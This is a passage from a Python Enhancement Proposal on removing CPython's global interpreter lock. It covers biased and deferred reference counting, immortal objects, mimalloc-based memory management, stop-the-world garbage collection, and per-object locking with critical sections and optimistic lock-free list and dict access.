Biased reference counting (BRC) is a technique first described in 2018 +by Jiho Choi, Thomas Shull, and Josep Torrellas [3]. It is based on the +observation that most objects are only accessed by a single thread, +even in multi-threaded programs. Each object is associated with an +owning thread (the thread that created it). Reference counting +operations from the owning thread use non-atomic instructions to +modify a “local” reference count. Other threads use atomic +instructions to modify a “shared” reference count. This design avoids +many atomic read-modify-write operations that are expensive on +contemporary processors.

+

The implementation of BRC proposed in this PEP largely matches the +original description of biased reference counting, but differs in +details like the size of reference counting fields and special bits in +those fields. BRC requires storing three pieces of information in each +object’s header: the “local” reference count, the “shared” reference +count, and the identifier of the owning thread. The BRC paper packs +these three things into a single 64-bit field. This PEP proposes using +three separate fields in each object’s header to avoid potential issues +due to reference count overflow. Additionally, the PEP supports a +faster deallocation path that avoids an atomic operation in the common +case.

+

The proposed PyObject struct (also called struct _object) is +below:

+
struct _object {
+  _PyObject_HEAD_EXTRA
+  uintptr_t ob_tid;         // owning thread id (4-8 bytes)
+  uint16_t __padding;       // reserved for future use (2 bytes)
+  PyMutex ob_mutex;         // per-object mutex (1 byte)
+  uint8_t ob_gc_bits;       // GC fields (1 byte)
+  uint32_t ob_ref_local;    // local reference count (4 bytes)
+  Py_ssize_t ob_ref_shared; // shared reference count and state bits (4-8 bytes)
+  PyTypeObject *ob_type;
+};
+
+
+

The ob_tid, ob_ref_local, and ob_ref_shared fields are used by the biased reference counting implementation. The ob_gc_bits field is used to store garbage collection flags that were previously stored in PyGC_Head (see Garbage Collection (Cycle Collection)). The ob_mutex field provides a per-object lock in a single byte.

+
+

Immortalization

+

Some objects, such as interned strings, small integers, statically +allocated PyTypeObjects, and the True, False, and None +objects stay alive for the lifetime of the program. These objects are +marked as immortal by setting the local reference count field +(ob_ref_local) to UINT32_MAX.

+

The Py_INCREF and Py_DECREF macros are no-ops for immortal +objects. This avoids contention on the reference count fields of +these objects when multiple threads access them concurrently.
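
A minimal sketch of the check implied by this sentinel (the helper name is illustrative):

#include <stdint.h>

/* Sketch: an object is immortal when its local reference count
 * field holds the sentinel value UINT32_MAX described above. */
static inline int
object_is_immortal(uint32_t ob_ref_local)
{
    return ob_ref_local == UINT32_MAX;
}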

+

This proposed immortalization scheme is very similar to PEP 683, +adopted in Python 3.12, but with slightly different bit representation +in the reference count fields for immortal objects in order to work +with biased reference counting and deferred reference counting. See +also Why Not Use PEP 683 Immortalization?.

+
+
+

Biased Reference Counting

+

Biased reference counting has a fast-path for objects “owned” by the +current thread and a slow-path for other objects. Ownership is +indicated by the ob_tid field. Determining the thread id requires +platform specific code [5]. A value of 0 in ob_tid +indicates that the object is not owned by any thread.

+

The ob_ref_local field stores the local reference count and two +flags. The two most significant bits are used to indicate the object +is immortal or uses deferred reference counting (see Deferred +reference counting).

+

The ob_ref_shared field stores the shared reference count. The +two least significant bits are used to store the reference +counting state. The shared reference count is therefore shifted left by +two. The ob_ref_shared field uses the least significant bits +because the shared reference count can be temporarily negative; increfs +and decrefs may not be balanced between threads.
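
A sketch of this field layout (the macro and helper names are illustrative; a real implementation would use atomic accesses):

#include <Python.h>

#define SHARED_SHIFT      2    /* count is stored shifted left by two */
#define SHARED_FLAG_MASK  0x3  /* low two bits hold the state */

static inline Py_ssize_t
shared_count(Py_ssize_t ob_ref_shared)
{
    /* Arithmetic right shift preserves temporarily negative counts. */
    return ob_ref_shared >> SHARED_SHIFT;
}

static inline int
shared_state(Py_ssize_t ob_ref_shared)
{
    return (int)(ob_ref_shared & SHARED_FLAG_MASK);
}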

+

The possible reference counting states are listed below:

+
    +
  • 0b00 - default
  • +
  • 0b01 - weakrefs
  • +
  • 0b10 - queued
  • +
  • 0b11 - merged
  • +
+

The states form a progression: during their lifecycle, objects may +transition to any numerically higher state. Objects can only be +deallocated from the “default” and “merged” states. Other states must +transition to the “merged” state before deallocation. Transitioning +states requires an atomic compare-and-swap on the ob_ref_shared +field.
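
A sketch of such a transition using C11 atomics (all names are illustrative):

#include <stdatomic.h>
#include <stdint.h>

/* Sketch: advance the low two state bits of ob_ref_shared. States
 * only move to numerically higher values, so if a concurrent thread
 * has already moved past the target state, nothing is done. */
static void
advance_state(_Atomic intptr_t *ob_ref_shared, intptr_t new_state)
{
    intptr_t old = atomic_load(ob_ref_shared);
    while ((old & 0x3) < new_state) {
        intptr_t desired = (old & ~(intptr_t)0x3) | new_state;
        if (atomic_compare_exchange_weak(ob_ref_shared, &old, desired))
            break;  /* on failure, 'old' is reloaded and the loop retries */
    }
}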

+
+
Default (0b00)
+

Objects are initially created in the default state. This is the only +state that allows for the quick deallocation code path. Otherwise, the +thread must merge the local and shared reference count fields, which +requires an atomic compare-and-swap.

+

This quick deallocation code path would not be thread-safe with +concurrent dereferencing of weakrefs, so the first time a weak +reference is created, the object is transitioned to the “weakrefs” +state if it is currently in the “default” state.

+

Similarly, the quick deallocation code path would not be thread-safe with the lockless list and dictionary accesses (see Optimistically Avoiding Locking), so the first time a non-owning thread attempts to retrieve an object in the “default” state it falls back to the slower locking code path and transitions the object to the “weakrefs” state.

+
+
+
Weakrefs (0b01)
+

Objects in weakref and higher states support dereferencing weakrefs +as well as the lockless list and dictionary access by non-owning +threads. They require transitioning to the merged state before +deallocation, which is more expensive than the quick deallocation code +path supported by the “default” state.

+
+
+
Queued (0b10)
+

The queued state indicates that a non-owning thread has requested that the reference count fields be merged. This can happen when the shared reference count becomes negative (due to an imbalance between increfs and decrefs between threads). The object is inserted into the owning thread’s queue of objects to be merged. The owning thread is notified via the eval_breaker mechanism. In practice, this operation is rare. Most objects are only accessed by a single thread and those objects accessed by multiple threads rarely have negative shared reference counts.

+

If the owning thread has terminated, the acting thread immediately +merges the local and shared reference count fields and transitions to +the merged state.

+
+
+
Merged (0b11)
+

The merged state indicates that the object is not owned by any thread. +The ob_tid field is zero in this state and ob_ref_local is not +used. Once the shared reference count reaches zero, the object can +be deallocated from the merged state.

+
+
+
Reference counting pseudo-code
+

The proposed Py_INCREF and Py_DECREF operation should behave +as follows (using C-like pseudo-code):

+
// low two bits of "ob_ref_shared" are used for flags
+#define _Py_SHARED_SHIFT 2
+
+void Py_INCREF(PyObject *op)
+{
+  uint32_t new_local = op->ob_ref_local + 1;
+  if (new_local == 0)
+    return;  // object is immortal
+  if (op->ob_tid == _Py_ThreadId())
+    op->ob_ref_local = new_local;
+  else
+    atomic_add(&op->ob_ref_shared, 1 << _Py_SHARED_SHIFT);
+}
+
+void Py_DECREF(PyObject *op)
+{
+  if (op->ob_ref_local == _Py_IMMORTAL_REFCNT) {
+    return;  // object is immortal
+  }
+  if (op->ob_tid == _Py_ThreadId()) {
+    op->ob_ref_local -= 1;
+    if (op->ob_ref_local == 0) {
+      _Py_MergeZeroRefcount(op); // merge the local and shared refcounts
+    }
+  }
+  else {
+    _Py_DecRefShared(op); // slow path
+  }
+}
+
+void _Py_MergeZeroRefcount(PyObject *op)
+{
+  if (op->ob_ref_shared == 0) {
+    // quick deallocation code path (common case)
+    op->ob_tid = 0;
+    _Py_Dealloc(op);
+  }
+  else {
+    // slower merging path not shown
+  }
+}
+
+
+

The reference implementation [17] contains implementations of +_Py_MergeZeroRefcount and _Py_DecRefShared.

+

Note that the above is pseudocode: in practice, the implementation +should use “relaxed atomics” to access ob_tid and +ob_ref_local to avoid undefined behavior in C and C++.

+
+
+
+

Deferred Reference Counting

+

A few types of objects, such as top-level functions, code objects, +modules, and methods, tend to be frequently accessed by many threads +concurrently. These objects don’t necessarily live for the lifetime of +the program, so immortalization is not a good fit. This PEP proposes a +limited form of deferred reference counting to avoid contention on +these objects’ reference count fields in multi-threaded programs.

+

Typically, the interpreter modifies objects’ reference counts as they +are pushed to and popped from the interpreter’s stack. The +interpreter skips these reference counting operations for objects +that use deferred reference counting. Objects that support deferred +reference counting are marked by setting the two most significant +bits in the local reference count field to one.
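
A sketch of this marking convention (names are illustrative; immortal objects, whose field is UINT32_MAX, also match this mask and would be distinguished separately in a full implementation):

#include <stdint.h>

/* Sketch: deferred reference counting is signalled by setting the two
 * most significant bits of the 32-bit local reference count field. */
#define DEFERRED_MASK  ((uint32_t)3 << 30)

static inline int
uses_deferred_refcounting(uint32_t ob_ref_local)
{
    return (ob_ref_local & DEFERRED_MASK) == DEFERRED_MASK;
}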

+

Because some reference counting operations are skipped, the reference +count fields no longer reflect the true number of references to these +objects. The true reference count is the sum of the reference count +fields plus any skipped references from each thread’s interpreter +stack. The true reference count can only be safely computed when all +threads are paused during cyclic garbage collection. Consequently, +objects that use deferred reference counting can only be deallocated +during garbage collection cycles.

+

Note that the objects that use deferred reference counting already +naturally form reference cycles in CPython, so they would typically be +deallocated by the garbage collector even without deferred reference +counting. For example, top-level functions and modules form a reference +cycle as do methods and type objects.

+
+
+

Garbage Collector Modifications for Deferred Reference Counting

+

The tracing garbage collector finds and deallocates unreferenced +objects. Currently, the tracing garbage collector only finds +unreferenced objects that are part of a reference cycle. With +deferred reference counting, the tracing garbage collector will also +find and collect some unreferenced objects that may not be part of +any reference cycle, but whose collection has been delayed due to +deferred reference counting. This requires that all objects that +support deferred reference counting also have a corresponding type +object that supports tracing garbage collection (through the +Py_TPFLAGS_HAVE_GC flag). Additionally, the garbage collector +will need to traverse each thread’s stack to add references to the GC +reference count at the start of each collection.

+
+
+

Reference Counting Type Objects

+

Type objects (PyTypeObject) use a mix of reference counting +techniques. Statically allocated type objects are immortalized because +the objects already live for the lifetime of the program. Heap type +objects use deferred reference counting in combination with per-thread +reference counting. Deferred reference counting is not sufficient to +address the multi-threaded scaling bottlenecks with heap types because +most references to heap types are from object instances, not references +on the interpreter stack.

+

To address this, heap type reference counts are partially stored in a distributed manner in per-thread arrays. Every thread stores an array of local reference counts, one entry per heap type object. Each heap type object is assigned a unique number that determines its position in the local reference count arrays. A heap type’s true reference count is the sum of its entries in the per-thread arrays, plus the reference count on the PyTypeObject, plus any deferred references in the interpreter stack.

+

Threads may grow their own type reference count arrays as needed when +incrementing or decrementing the local reference count of a type +object.
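
A simplified sketch of the growable per-thread array (all names are illustrative; no atomics are needed because each array is only written by its own thread):

#include <Python.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    Py_ssize_t *counts;  /* indexed by the heap type's unique number */
    Py_ssize_t  size;
} type_refcounts;

static int
local_incref_type(type_refcounts *tr, Py_ssize_t type_index)
{
    if (type_index >= tr->size) {
        /* Grow on demand, zero-filling the new entries. */
        Py_ssize_t new_size = type_index + 1;
        Py_ssize_t *grown = realloc(tr->counts,
                                    (size_t)new_size * sizeof(*grown));
        if (grown == NULL)
            return -1;
        memset(grown + tr->size, 0,
               (size_t)(new_size - tr->size) * sizeof(*grown));
        tr->counts = grown;
        tr->size = new_size;
    }
    tr->counts[type_index]++;
    return 0;
}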

+

Use of the per-thread reference count arrays is limited to a few +places:

+
    +
  • PyType_GenericAlloc(PyTypeObject *type, Py_ssize_t nitems): +Increments the current thread’s local reference count for type, +if it is a heap type.
  • +
  • subtype_dealloc(PyObject *self): Decrements the current thread’s +local reference count for self->ob_type, if the type is a heap +type.
  • +
  • gcmodule.c: Adds each thread’s local reference counts to the +gc_refs count for the corresponding heap type object.
  • +
+

Additionally, when a thread terminates, it adds any non-zero local +reference counts to each type object’s own reference count field.

+
+
+
+

Memory Management

+

CPython currently uses an internal allocator, pymalloc, which is +optimized for small object allocation. The pymalloc implementation is +not thread-safe without the GIL. This PEP proposes replacing pymalloc +with mimalloc, a general-purpose thread-safe allocator with good +performance, including for small allocations.

+

Using mimalloc, with some modifications, also addresses two other +issues related to removing the GIL. First, traversing the internal +mimalloc structures allows the garbage collector to find all Python +objects without maintaining a linked list. This is described in more +detail in the garbage collection section. Second, mimalloc heaps and +allocations based on size class enable collections like dict to +generally avoid acquiring locks during read-only operations. This is +described in more detail in the collection thread-safety section.

+

CPython already requires that objects that support garbage collection +use the GC allocator APIs (typically indirectly by calling +PyType_GenericAlloc). This PEP would add additional requirements +to the use of the Python allocator APIs. First, Python objects must +be allocated through object allocation APIs, such as +PyType_GenericAlloc, PyObject_Malloc, or other Python APIs +that wrap those calls. Python objects should not be allocated through +other APIs, such as raw calls to C’s malloc or the C++ new operator. +Additionally, PyObject_Malloc should be used only for allocating +Python objects; it should not be used for allocating buffers, +storages, or other data structures that are not PyObjects.

+

This PEP also imposes restrictions on the pluggable allocator API +(PyMem_SetAllocator). When compiling without the GIL, allocators +set using this API must eventually delegate the allocation to the +corresponding underlying allocator, such as PyObject_Malloc, for +Python object allocations. This allows for allocators that “wrap” +underlying allocators, such as Python’s tracemalloc and debug +allocator, but not for wholly replacing the allocator.
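
For illustration, a sketch of a conforming “wrapping” allocator using the existing PyMem_SetAllocator API (the statistics counter is a toy and not thread-safe):

#include <Python.h>

static PyMemAllocatorEx wrapped;  /* the previously installed allocator */
static size_t alloc_count = 0;    /* toy statistic */

static void *counting_malloc(void *ctx, size_t size) {
    alloc_count++;
    return wrapped.malloc(wrapped.ctx, size);  /* always delegate */
}
static void *counting_calloc(void *ctx, size_t nelem, size_t elsize) {
    alloc_count++;
    return wrapped.calloc(wrapped.ctx, nelem, elsize);
}
static void *counting_realloc(void *ctx, void *ptr, size_t new_size) {
    return wrapped.realloc(wrapped.ctx, ptr, new_size);
}
static void counting_free(void *ctx, void *ptr) {
    wrapped.free(wrapped.ctx, ptr);
}

static void
install_counting_allocator(void)
{
    PyMem_GetAllocator(PYMEM_DOMAIN_OBJ, &wrapped);
    PyMemAllocatorEx alloc = {NULL, counting_malloc, counting_calloc,
                              counting_realloc, counting_free};
    PyMem_SetAllocator(PYMEM_DOMAIN_OBJ, &alloc);
}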

+
+

CPython Free Lists

+

CPython makes use of free lists to speed up the allocation of small, +frequently allocated objects like tuples and numbers. These free +lists are moved to PyThreadState from per-interpreter state.

+
+
+
+

Garbage Collection (Cycle Collection)

+

The CPython garbage collector requires the following changes to work +with this proposal:

+
    +
  • Use of “stop-the-world” to provide thread-safety guarantees that +were previously provided by the GIL.
  • +
  • Elimination of generational garbage collection in favor of +non-generational collector.
  • +
  • Integration with deferred reference counting and biased reference +counting.
  • +
+

Additionally, the above changes enable removing the +_gc_prev and _gc_next fields from GC objects. The GC bits +that stored the tracked, finalized, and unreachable states are moved +to the ob_gc_bits field in the PyObject header.

+
+

Stop-the-World

+

The CPython cycle garbage collector currently relies on the global +interpreter lock to prevent other threads from accessing Python +objects while the collector finds cycles. The GIL is never released +during the cycle-finding routine, so the collector can rely on +stable (i.e., unchanging) reference counts and references for the +duration of that routine. However, following cycle detection, the GIL +may be temporarily released while calling objects’ finalizers and +clear (tp_clear) functions, allowing other threads to run in an +interleaved fashion.

+

When running without the GIL, the implementation needs a way to ensure +that reference counts remain stable during cycle detection. Threads +running Python code must be paused to ensure that references and +reference counts remain stable. Once the cycles are identified, other +threads are resumed.

+

The current CPython cyclic garbage collector involves two +cycle-detection passes during each garbage collection cycle. +Consequently, this requires two stop-the-world pauses when running the +garbage collector without the GIL. The first cycle-detection pass +identifies cyclic trash. The second pass runs after finalizers to +identify which objects still remain unreachable. Note that other +threads are resumed before finalizers and tp_clear functions are +called to avoid introducing potential deadlocks that are not present in +the current CPython behavior.

+
+
+

Thread States

+

To support pausing threads for garbage collection, the PyThreadState +gets a new “status” field. Like the other fields in PyThreadState, +the status field is not part of the public CPython API. The status +field may be in one of three states:

+
    +
  • ATTACHED
  • +
  • DETACHED
  • +
  • GC
  • +
+

The ATTACHED and DETACHED states correspond closely to +acquiring and releasing the global interpreter lock. When compiling +without the GIL, functions that previously acquired the GIL instead +transition the thread state to ATTACHED, and functions that +previously released the GIL transition the thread state +to DETACHED. Just as threads previously needed to acquire the +GIL before accessing or modifying Python objects, they now must be in +the ATTACHED state before accessing or modifying Python +objects. Since the same public C-API functions “attach” the thread as +previously acquired the GIL (e.g., PyEval_RestoreThread), the +requirements for thread initialization in extensions remain the same. +The substantial difference is that multiple threads can be in the +attached state simultaneously, while previously only one thread could +acquire the GIL at a time.

+

During stop-the-world pauses, the thread performing garbage collection +needs to ensure that no other thread is accessing or modifying Python +objects. All other threads must be in the “GC” state. The garbage +collection thread can transition other threads from the DETACHED +state to the GC state using an atomic compare-and-swap operation on +the status field. Threads in the ATTACHED state are requested to +pause themselves and set their status to “GC”, using the +existing “eval breaker” mechanism. At the end of the stop-the-world +pause, all threads in the “GC” state are set to DETACHED and +woken up if they are paused. Threads that were previously attached +(i.e., executing Python bytecode) can re-attach (set their thread +states to ATTACHED) and resume executing Python code. Threads +that were previously DETACHED ignore the notification.

+
+
+

Generations

+

The existing Python garbage collector uses three generations. When +compiling without the GIL, the garbage collector will only use a single +generation (i.e., it will be non-generational). The primary reason for +this change is to reduce the impact of the stop-the-world pauses in +multithreaded applications. Frequent stop-the-world pauses for +collecting the young generation would have more of an impact on +multi-threaded applications than less frequent collections.

+
+
+

Integration With Deferred and Biased Reference Counting

+

To find unreferenced objects, the cyclic garbage collector computes +the difference between the number of incoming references and the +object’s reference count. This difference is called gc_refs and +is stored in the _gc_prev field. If gc_refs is greater than +zero, then the object is guaranteed to be alive (i.e., not cyclic +trash). If gc_refs is zero, then the object is only alive if it +is transitively referenced by another live object. When computing +this difference, the collector should traverse each thread’s stack, +and for every deferred reference, increment the gc_refs for the +referred object. Since generator objects also have stacks with +deferred references, the same procedure is applied to each +generator’s stack.

+

Python unit tests commonly use gc.collect() to ensure that any +unreferenced objects are destructed and their finalizers run. Since +biased reference counting can delay the destruction of some objects +that are referenced by multiple threads, it’s convenient to ensure +that those objects are destructed during garbage collection, even +though they may not be part of any reference cycles. While other +threads are paused, the garbage collector thread should merge the +reference counts for any queued objects, but not call any destructors +even if the combined reference count is zero. (Calling destructors +while other threads are paused risks introducing deadlocks.) Once +other threads are resumed, the GC thread should call _Py_Dealloc +on those objects with a zero merged reference count.

+
+
+
+

Container Thread-Safety

+

In CPython, the global interpreter lock protects against corruption of +internal interpreter states when multiple threads concurrently access +or modify Python objects. For example, if multiple threads +concurrently modify the same list, the GIL ensures that the length of +the list (ob_size) accurately matches the number of elements, and +that the reference counts of each element accurately reflect the +number of references to those elements. Without the GIL — and +absent other changes — concurrent modifications would corrupt those +fields and likely lead to program crashes.

+

The GIL does not necessarily ensure that operations are atomic or +remain correct when multiple operations occur concurrently. For +example, list.extend(iterable) may not appear atomic if the +iterable has an iterator implemented in Python (or releases the GIL +internally). Similarly, list.remove(x) can remove the wrong +object if it overlaps with another operation that modifies the list, +depending on the implementation of the equality operator. Still, the +GIL ensures that some operations are effectively atomic. For example, +the constructor list(set) atomically copies the items of the set +to a new list, and some code relies on that copy being atomic +(i.e., having a snapshot of the items in the set). This PEP preserves +that property.

+

This PEP proposes using per-object locks to provide many of the same +protections that the GIL provides. For example, every list, +dictionary, and set will have an associated lightweight lock. All +operations that modify the object must hold the object’s lock. Most +operations that read from the object should acquire the object’s lock +as well; the few read operations that can proceed without holding a +lock are described below.

+

Per-object locks with critical sections provide weaker protections +than the GIL. Because the GIL doesn’t necessarily ensure that +concurrent operations are atomic or correct, the per-object locking +scheme also cannot ensure that concurrent operations are atomic or +correct. Instead, per-object locking aims for similar protections as +the GIL, but with mutual exclusion limited to individual objects.

+

Most operations on an instance of a container type require locking +that object. For example:

+
    +
  • list.append, list.insert, list.repeat, +PyList_SetItem
  • +
  • dict.__setitem__, PyDict_SetItem
  • +
  • list.clear, dict.clear
  • +
  • list.__repr__, dict.__repr__, etc.
  • +
  • list.extend(iterable)
  • +
  • setiter_iternext
  • +
+

Some operations operate directly on two container objects, with +knowledge about both containers’ internal structure. For example, +there are internal specializations of list.extend(iterable) for +specific iterable types, like set. These operations need to lock +both container objects because they access the internals of both +objects simultaneously. Note that the generic implementation of +list.extend only needs to lock one object (the list) because the +other object is accessed indirectly through the thread-safe iterator +API. Operations that lock two containers are:

+
    +
  • list.extend(list), list.extend(set), list.extend +(dictitems), and other specializations where the implementation +is specialized for argument type.
  • +
  • list.concat(list)
  • +
  • list.__eq__(list), dict.__eq__(dict)
  • +
+

Some simple operations can be implemented directly with atomic +accesses and do not need locks because they only access a single +field. These operations include:

+
    +
  • len(list) i.e., list_length(PyListObject *a)
  • +
  • len(dict)
  • +
  • len(set)
  • +
+

A select few operations optimistically avoid locking to improve +performance. These require special implementations and cooperation +from the memory allocator:

+
    +
  • list[idx] (list_subscript)
  • +
  • dict[key] (dict_subscript)
  • +
  • listiter_next, dictiter_iternextkey/value/item
  • +
  • list.contains
  • +
+
+

Borrowed References

+

Per-object locking provides many of the important protections that the +GIL provides, but there are a few cases where it’s not sufficient. +For example, code that relies on upgrading a borrowed reference to +an “owned” reference may be unsafe in certain circumstances:

+
PyObject *item = PyList_GetItem(list, idx);
+Py_INCREF(item);
+
+
+

The GIL ensures that no other thread can modify the list in between +the access and the Py_INCREF call. Without the GIL – even with +per-object locking – another thread might modify the list leading to +item being freed between the access and the Py_INCREF call.

+

The problematic borrowed reference APIs are supplemented with +functions that return “new references” but are otherwise +equivalent:

+
    +
  • PyList_FetchItem(list, idx) for PyList_GetItem
  • +
  • PyDict_FetchItem(dict, key) for PyDict_GetItem
  • +
  • PyWeakref_FetchObject for PyWeakref_GetObject
  • +
+

Note that some APIs that return borrowed references, such as +PyTuple_GetItem, are not problematic because tuples are +immutable. Similarly, not all uses of the above APIs are problematic. +For example, PyDict_GetItem is often used for parsing keyword +argument dictionaries in function calls; those keyword argument +dictionaries are effectively private (not accessible by other +threads).
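
Using the proposed API, the earlier example might be rewritten as follows (a sketch; error handling abbreviated):

/* Returns a new reference, so the item cannot be freed between the
 * lookup and the reference count increment. */
PyObject *item = PyList_FetchItem(list, idx);
if (item == NULL) {
    /* error (or index out of range) */
}
/* ... use item ... */
Py_DECREF(item);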

+
+
+

Python Critical Sections

+

Straightforward per-object locking could introduce deadlocks that were +not present when running with the GIL. Threads may hold locks for +multiple objects simultaneously because Python operations can nest. +Operations on objects can invoke operations on other objects, +acquiring multiple per-object locks. If threads try to acquire the +same locks in different orders, they will deadlock.

+

This PEP proposes a scheme called “Python critical sections” to +implicitly release per-object locks to avoid deadlocks. To +understand the scheme, we first introduce a general approach to avoid +deadlocks, and then propose a refinement of that approach with better +performance.

+

One way to avoid deadlocks is to allow threads to hold only the lock +(or locks) for a single operation at a time (typically a single lock, +but some operations involve two locks as described above). When a +thread begins a nested operation it should suspend the locks for any +outer operation: before beginning the nested operation, the locks for +the outer operation are released and when the nested operation +completes, the locks for the outer operation are reacquired.

+

Additionally, the locks for any active operation should be suspended +around potentially blocking operations, such as I/O (i.e., operations +that would have released the GIL). This is because the interaction +between locks and blocking operations can lead to deadlocks in the +same way as the interaction between multiple locks.

+

To improve performance, this PEP proposes a variation of the above +scheme that still avoids deadlocks. Instead of immediately +suspending locks any time a nested operation begins, locks are only +suspended if the thread would block (i.e., would have released the +GIL). This reduces the number of lock acquisitions and releases for +nested operations, while avoiding deadlocks.

+

The proposed API for Python critical sections are the following four +macros. These are intended to be public (usable by C-API extensions), +but not part of the limited API:

+
    +
• Py_BEGIN_CRITICAL_SECTION(PyObject *op);: Begins a critical section by acquiring the mutex for the referenced object. If the object is already locked, then locks for any outstanding critical sections are released before this thread waits for the referenced object to be unlocked.
  • +
  • Py_END_CRITICAL_SECTION;: +Ends the most recent operation, unlocking the mutex. The next +most recent previous critical section (if any) is resumed if it is +currently suspended.
  • +
  • Py_BEGIN_CRITICAL_SECTION2(PyObject *a, PyObject *b);: +Begins a critical section by acquiring the mutexes for two objects. +To ensure consistent lock ordering, the order of acquisition is +determined by memory address (i.e., the mutex with lower memory +address is acquired first). If either mutex is already locked, then +locks for any outstanding critical sections are released before this +thread waits for the referenced objects to be unlocked.
  • +
  • Py_END_CRITICAL_SECTION2;: +Behaves the same as Py_END_CRITICAL_SECTION but unlocks two +objects.
  • +
+

Additionally, when a thread transitions from the ATTACHED state to +the DETACHED state, it should suspend any active critical +sections. When transitioning from DETACHED to ATTACHED, the +most recent suspended critical section, if any, should be resumed.

+

Note that operations that lock two containers simultaneously need to use +the Py_BEGIN_CRITICAL_SECTION2 macro. It is not sufficient to nest +two calls to Py_BEGIN_CRITICAL_SECTION because the inner critical +section may release the locks from the outer critical section.
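
For illustration, a sketch following the macro signatures listed above (the variable names are illustrative):

/* An operation that touches the internals of two lists locks both
 * at once; lock ordering is handled internally by memory address. */
Py_BEGIN_CRITICAL_SECTION2(a, b);
/* ... access the internal arrays of both 'a' and 'b' ... */
Py_END_CRITICAL_SECTION2;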

+
+
+

Optimistically Avoiding Locking

+

A few operations on dict and list optimistically avoid +acquiring the per-object locks. They have a fast path operation that +does not acquire locks, but may fall back to a slower operation that +acquires the dictionary’s or list’s lock when another thread is +concurrently modifying that container.

+

The operations with an optimistic fast path are:

+
    +
  • PyDict_FetchItem/GetItem and dict.__getitem__
  • +
  • PyList_FetchItem/GetItem and list.__getitem__
  • +
+

Additionally, iterators for dict and list use the above +functions so they also optimistically avoid locking when returning +the next item.

+

There are two motivations for avoiding lock acquisitions in these +functions. The primary reason is that it is necessary for scalable +multi-threaded performance even for simple applications. Dictionaries +hold top-level functions in modules and methods for classes. These +dictionaries are inherently highly shared by many threads in +multi-threaded programs. Contention on these locks in multi-threaded +programs for loading methods and functions would inhibit efficient +scaling in many basic programs.

+

The secondary motivation for avoiding locking is to reduce overhead and improve single-threaded performance. Although lock acquisition has low overhead compared to most operations, accesses to individual elements of lists and dictionaries are fast operations (so the locking overhead is comparatively larger) and frequent (so the overhead has more impact).

+

This section describes the challenges with implementing dictionary and +list accesses without locking followed by a description of this PEP’s +changes to the Python interpreter required to address those +challenges.

+

The main challenge is that retrieving an item from a list or +dictionary and incrementing the reference count of that item is not +an atomic operation. In between the time the item is retrieved and +the reference count is incremented, another thread may modify the +list or dictionary, possibly freeing the memory for the previously +retrieved item.

+

A partial attempt at addressing this issue would be to convert the +reference count increment to a conditional increment, only +incrementing the reference count if it’s not zero. This change is +not sufficient because when a Python object’s reference count reaches +zero, the object’s destructor is called and the memory storing the +object may be re-used for other data structures or returned to the +operating system. Instead, this PEP proposes a technique to ensure +that the reference count fields remain valid for the duration of the +access, so that the conditional reference count increment is safe. +This technique requires cooperation from the memory allocator +(mimalloc) as well as changes to the list and dictionary objects. The +proposed technique is similar to read-copy update (RCU) [6], a +synchronization mechanism widely used in the Linux kernel.

+

The current implementation of list_item (the C function +implementing list.__getitem__) is the following:

+
Py_INCREF(a->ob_item[i]);
+return a->ob_item[i];
+
+
+

The proposed implementation uses the conditional increment +(_Py_TRY_INCREF) and has additional checks:

+
 PyObject **ob_item = atomic_load(&a->ob_item);
+ PyObject *item = atomic_load(&ob_item[i]);
+ if (!item || !_Py_TRY_INCREF(item)) goto retry;
+ if (item != atomic_load(&ob_item[i])) {
+   Py_DECREF(item);
+   goto retry;
+ }
+ if (ob_item != atomic_load(&a->ob_item)) {
+   Py_DECREF(item);
+   goto retry;
+ }
+return item;
+
+
+

The “retry” subroutine implements the locked fallback path when +concurrent modifications to the list cause the above fast, +non-locking path to fail:

+
retry:
+  PyObject *item;
+  Py_BEGIN_CRITICAL_SECTION(a->ob_mutex);
+  item = a->ob_item[i];
+  Py_INCREF(item);
+  Py_END_CRITICAL_SECTION(a->ob_mutex);
+  return item;
+
+
+

The modifications to the dict implementation are similar, because +the relevant parts of both list and dictionary retrieval involve +loading an item/value from an array at a known index.

+

The additional checks following the conditional increment are necessary because the scheme allows immediate re-use of memory, including memory that previously held a PyObject structure or a list or dict array. Without these extra checks, the function might return a Python object that was never in the list: if the retrieved item is freed and its memory immediately re-used for a new PyObject, the conditional increment can succeed on the new object even though it was never stored in the list.

+
+
+

Mimalloc Changes for Optimistic list and dict Access

+

The implementation requires additional constraints on the memory allocator, including some changes to the mimalloc code. Some background on mimalloc’s implementation is helpful to understand the required changes. Individual allocations from mimalloc are called “blocks.” Mimalloc “pages” contain consecutive blocks that are all the same size. A mimalloc “page” is similar to a “superblock” in other allocators; it is NOT an operating system page. A mimalloc “heap” contains pages of various size classes; each page belongs to a single heap. If none of the blocks of a page are allocated, then mimalloc may re-use the page for a different size class or different heap (i.e., it might reinitialize the page).

+

The list and dictionary access scheme works by partially restricting re-use of mimalloc pages so that reference count fields remain valid for the duration of the access. The restricted re-use of mimalloc pages is enforced by having separate heaps for Python objects [7]. This ensures that even if an item is freed during access and the memory reused for a new object, the new object’s reference count field is placed at the same location in memory. The reference count field remains valid (or zero) across allocations.

+

Python objects that support Py_TPFLAGS_MANAGED_DICT have their +dictionary and weak reference fields preceding the PyObject +header, so their reference count fields are at a different offset from +the start of their allocations. They are stored in a separate mimalloc +heap. Additionally, non-GC objects are stored in their own heap so +that the GC only has to look at GC objects. There are therefore three +mimalloc heaps for Python objects, one for non-GC objects, one for GC +objects with managed dictionaries, and one for GC objects without +managed dictionaries.

+
+
+

Mimalloc Page Reuse

+

It is beneficial to keep the restrictions on mimalloc page reuse to a +short period of time to avoid increasing overall memory usage. +Precisely limiting the restrictions to list and dictionary accesses +would minimize memory usage, but would require expensive +synchronizations. At the other extreme, keeping the restrictions +until the next GC cycle would avoid introducing any extra +synchronizations, but would potentially increase memory usage.

+

This PEP proposes a system that lies between those two extremes based +on FreeBSD’s “GUS” [8]. It uses a combination of global and +per-thread counters (or “sequence numbers”) to coordinate the +determination of when it is safe to reuse an empty mimalloc page for +a different heap or for a different size class, or to return it to +the operating system:

+
    +
  • There is a global write sequence number that monotonically +increases.
  • +
  • When a mimalloc page is empty, it’s tagged with the current write +sequence number. The thread may also atomically increment the +global write sequence number.
  • +
  • Each thread has a local read sequence number that records the most +recent write sequence number it has observed.
  • +
  • Threads may observe the write sequence number whenever they are not +in a list or dictionary access. The reference implementation does +this in mimalloc’s slow-path allocation function. This is called +regularly enough to be useful, but not so frequently as to +introduce significant overhead.
  • +
